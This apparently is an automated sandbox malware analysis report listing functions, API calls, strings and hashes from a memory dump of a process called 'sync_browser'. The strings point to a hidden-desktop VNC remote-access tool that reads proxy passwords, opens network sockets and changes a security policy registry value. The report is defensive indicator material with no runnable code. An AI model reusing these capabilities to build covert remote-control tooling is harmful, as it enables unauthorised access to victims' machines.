vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2523754900-3977938048
Opcode ID: 9227ce4079e5a41e03d7563405cc525baa42e0cbfd58b8351677ff8904443c0f
Instruction ID: 559caeaf78fcc754f6092f94802ea67a1bf55f1ead91c6228ed5e25dcdbdbdd1
Opcode Fuzzy Hash: 9227ce4079e5a41e03d7563405cc525baa42e0cbfd58b8351677ff8904443c0f
Instruction Fuzzy Hash: 40B1D233A18AC185FB50CB25C4597FE6BA5EBA5B84F194131EA4C8B7A5DF3CE849C700

Function 00007FF67E7E6C6A Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 213COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E7BAC

Part of subcall function 00007FF67E7EB510: GetTickCount.KERNEL32 ref: 00007FF67E7EB58C
Part of subcall function 00007FF67E7EB510: SetEndOfFile.KERNEL32 ref: 00007FF67E7EB5BC
Part of subcall function 00007FF67E7EB510: FlushFileBuffers.KERNEL32 ref: 00007FF67E7EB5C9
Part of subcall function 00007FF67E7EB510: SystemTimeToFileTime.KERNEL32 ref: 00007FF67E7EB645
Part of subcall function 00007FF67E7EB510: SetFileTime.KERNEL32 ref: 00007FF67E7EB65E
Part of subcall function 00007FF67E7EB510: CloseHandle.KERNEL32 ref: 00007FF67E7EB671
Part of subcall function 00007FF67E7EB510: DeleteFileA.KERNEL32 ref: 00007FF67E7EB6C2

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$Time$CloseDesktop$BuffersCountCriticalDeleteFlushHandleInputLeaveOpenSectionSystemTick
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 744660428-3977938048
Opcode ID: 7bf16dcfdd47bc453c302434e59752195ffbaf72f3b0f9fbd8307d08b7ae1e5b
Instruction ID: 2deae6fc2b38d0e3a6b53bca0f66e6761eda1d92d1515c8c3e41cb70c88c7e87
Opcode Fuzzy Hash: 7bf16dcfdd47bc453c302434e59752195ffbaf72f3b0f9fbd8307d08b7ae1e5b
Instruction Fuzzy Hash: F4B1C523A18AC185FB50CB25C4587FE6BA5EBA5B84F194131EA4C8B7E5DF3CE449C700

Function 00007FF67E7CB8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF67E7CB931
inet_addr.WS2_32 ref: 00007FF67E7CB9C2
gethostbyname.WS2_32 ref: 00007FF67E7CB9CE
htons.WS2_32 ref: 00007FF67E7CB9FE
socket.WS2_32 ref: 00007FF67E7CBA13
connect.WS2_32 ref: 00007FF67E7CBA2A

Strings

0123456789., xrefs: 00007FF67E7CB901, 00007FF67E7CB992

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: inet_addr$connectgethostbynamehtonssocket
String ID: 0123456789.
API String ID: 478842821-2088042752
Opcode ID: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
Instruction ID: 7379331a97854780c1f41fa11562a136a928119b78286d04d3772e435b9b371c
Opcode Fuzzy Hash: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
Instruction Fuzzy Hash: B4418362B2865185EA219F25D440079B3A4FF58F94F045631FD8D47794EF3CE549C710

Function 00007FF67E7E8ED0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF67E7E8F3A
PtInRect.USER32 ref: 00007FF67E7E8F4A
EnterCriticalSection.KERNEL32 ref: 00007FF67E7E8F79
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E8F8C
GetCursorPos.USER32 ref: 00007FF67E7E8FB1
EnterCriticalSection.KERNEL32 ref: 00007FF67E7E9006
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E9037

Strings

^, xrefs: 00007FF67E7E8FFB

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CursorEnterLeave$Rect
String ID: ^
API String ID: 2550375211-1590793086
Opcode ID: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
Instruction ID: e441d15a6465f62ce021d9fcb09086a2a43235fce22b8f7e3fd7c113cc833b4d
Opcode Fuzzy Hash: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
Instruction Fuzzy Hash: 5A41ED37A186818BE728CF19E5942ADB7A1F798B94F144236EB5D43B54CF3CE468CB00

Function 00007FF67E7CA6B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF67E7CA716
GetLastError.KERNEL32 ref: 00007FF67E7CA720
SystemParametersInfoA.USER32 ref: 00007FF67E7CA794
GetLastError.KERNEL32 ref: 00007FF67E7CA79E

Strings

HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF67E7CA7E7
HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF67E7CA726
HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF67E7CA7AC
HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF67E7CA738

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
API String ID: 2777246624-2146332292
Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
Instruction ID: 0814affb30f4ee2347e3e4da4afea0b81a02e60a3402bf8def453eb74aec3a8a
Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
Instruction Fuzzy Hash: A5419637F286828AE724CF54F8405A9B365FB64748F500636FA8E97A68DF3CE559C700

Function 00007FF67E7D9630 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION ref: 00007FF67E7D9655
GetLastError.KERNEL32 ref: 00007FF67E7D965D

Strings

\StringFileInfo\040904b0\ProductVersion, xrefs: 00007FF67E7D96B3
\StringFileInfo\000004b0\ProductVersion, xrefs: 00007FF67E7D96D1
Fail: Using 32bit winvnc.exe with a 64bit driver? , xrefs: 00007FF67E7D9667

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFileInfoLastSizeVersion
String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
API String ID: 752140088-134519983
Opcode ID: 754b2deb5e9b2189dacc26593cdec6785eb92fb7aaf1290d564a347170cf9d67
Instruction ID: 4262cc8f796d8d4e5a691bba571a7dda0d9846faed188d8267cbfd36faed0f53
Opcode Fuzzy Hash: 754b2deb5e9b2189dacc26593cdec6785eb92fb7aaf1290d564a347170cf9d67
Instruction Fuzzy Hash: 9321D867B2964681EA10DBA6A8401E9E3A0FF95BD5F440031FE4D87758EF7CD58EC700

Function 00007FF67E7CB460 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 61COMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF67E7CB479

Part of subcall function 00007FF67E879500: _errno.LIBCMT ref: 00007FF67E879515
Part of subcall function 00007FF67E879500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E879520

_wgetenv.LIBCMT ref: 00007FF67E7CB4B0
_wgetenv.LIBCMT ref: 00007FF67E7CB4E3
_wgetenv.LIBCMT ref: 00007FF67E7CB511

Strings

SOCKS5_PASSWD, xrefs: 00007FF67E7CB4A9, 00007FF67E7CB4BD
CONNECT_PASSWORD, xrefs: 00007FF67E7CB50A, 00007FF67E7CB51E
HTTP_PROXY_PASSWORD, xrefs: 00007FF67E7CB472, 00007FF67E7CB486
SOCKS5_PASSWORD, xrefs: 00007FF67E7CB4DC, 00007FF67E7CB4F0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _wgetenv$_errno_invalid_parameter_noinfo
String ID: CONNECT_PASSWORD$HTTP_PROXY_PASSWORD$SOCKS5_PASSWD$SOCKS5_PASSWORD
API String ID: 1184729097-3964388033
Opcode ID: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
Instruction ID: c2b8b1cf504bcf0e2f0dea96a7d8b962486b407192e00f7000f8c9855ac314f1
Opcode Fuzzy Hash: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
Instruction Fuzzy Hash: 0321EA23F3AA4380FD959B64E4512B492A8AF74740F4D4935FA0D863E2FF2CE94DD240

Function 00007FF67E7F3523 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58timethreadclipboardCOMMON

Download Yara Rule

APIs

KillTimer.USER32 ref: 00007FF67E7F352B
ChangeClipboardChain.USER32 ref: 00007FF67E7F3540
GetCurrentThreadId.KERNEL32 ref: 00007FF67E7F35B1

Strings

vncdesktopsink.cpp : Unsethooks OK, xrefs: 00007FF67E7F35D3
vncdesktopsink.cpp : Unsethooks Failed, xrefs: 00007FF67E7F35CA
vncdesktopsink.cpp : WM_DESTROY, xrefs: 00007FF67E7F35E5
vncdesktopsink.cpp : unset W8 hooks OK, xrefs: 00007FF67E7F3564
vncdesktopsink.cpp : unset SC hooks OK, xrefs: 00007FF67E7F3588

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ChainChangeClipboardCurrentKillThreadTimer
String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
API String ID: 3622578367-539335655
Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
Instruction ID: 1e30fdd6bb38423943719718e887930050f4ff41c2c161c69ebddd284ccd8133
Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
Instruction Fuzzy Hash: 06212E57B28982A6F64CDF74D9541F9A3A9FFA4701F444532E62ED21A0DF3CA4A9C600

Function 00007FF67E7D3BE0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF67E7D3C1F
RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7D3C48
RegSetValueExA.ADVAPI32 ref: 00007FF67E7D3C81
RegCloseKey.ADVAPI32 ref: 00007FF67E7D3C8C
RegCloseKey.ADVAPI32 ref: 00007FF67E7D3C97

Strings

SoftwareSASGeneration, xrefs: 00007FF67E7D3C5C
System, xrefs: 00007FF67E7D3C33
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF67E7D3BE9

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$CreateOpenValue
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
API String ID: 678895439-3579764778
Opcode ID: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
Instruction ID: 931e0b3a536fe6af851cb7a6f1c3580f31b7d672ad4c022ae827d0964d2e024d
Opcode Fuzzy Hash: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
Instruction Fuzzy Hash: 9C111F72A28B4286EB508F25F84865AB7A4FB94798F501131F78D87B68EF3CD149CF00

Function 00007FF67E7D3CB0 Relevance: 14.0, APIs: 5, Strings: 3, Instructions: 34registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF67E7D3CEF
RegOpenKeyExA.ADVAPI32 ref: 00007FF67E7D3D18
RegDeleteValueA.ADVAPI32 ref: 00007FF67E7D3D2E
RegCloseKey.ADVAPI32 ref: 00007FF67E7D3D39
RegCloseKey.ADVAPI32 ref: 00007FF67E7D3D44

Strings

SoftwareSASGeneration, xrefs: 00007FF67E7D3D27
System, xrefs: 00007FF67E7D3D03
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF67E7D3CB9

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$CreateDeleteOpenValue
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
API String ID: 2881815620-3579764778
Opcode ID: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
Instruction ID: e171e1084ef3f34e9181a27492a7dc71b45baeec213dcca2f321c49bf68efa14
Opcode Fuzzy Hash: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
Instruction Fuzzy Hash: 35011233E28B4282EB508B25F84556AB7A4FB94794F501131F68D87A64DF3CD159CB00

Function 00007FF67E87AD6C Relevance: 13.6, APIs: 9, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF67E87AD95

Part of subcall function 00007FF67E8877D0: _amsg_exit.LIBCMT ref: 00007FF67E8877FA

DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87ADC8
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87ADE6
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87AE26
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87AE40
DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF67E87AF59,?,?,00000000,00007FF67E8877FF), ref: 00007FF67E87AE50
_initterm.LIBCMT ref: 00007FF67E87AE90
_initterm.LIBCMT ref: 00007FF67E87AEA3
ExitProcess.KERNEL32 ref: 00007FF67E87AEDC

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3873167975-0
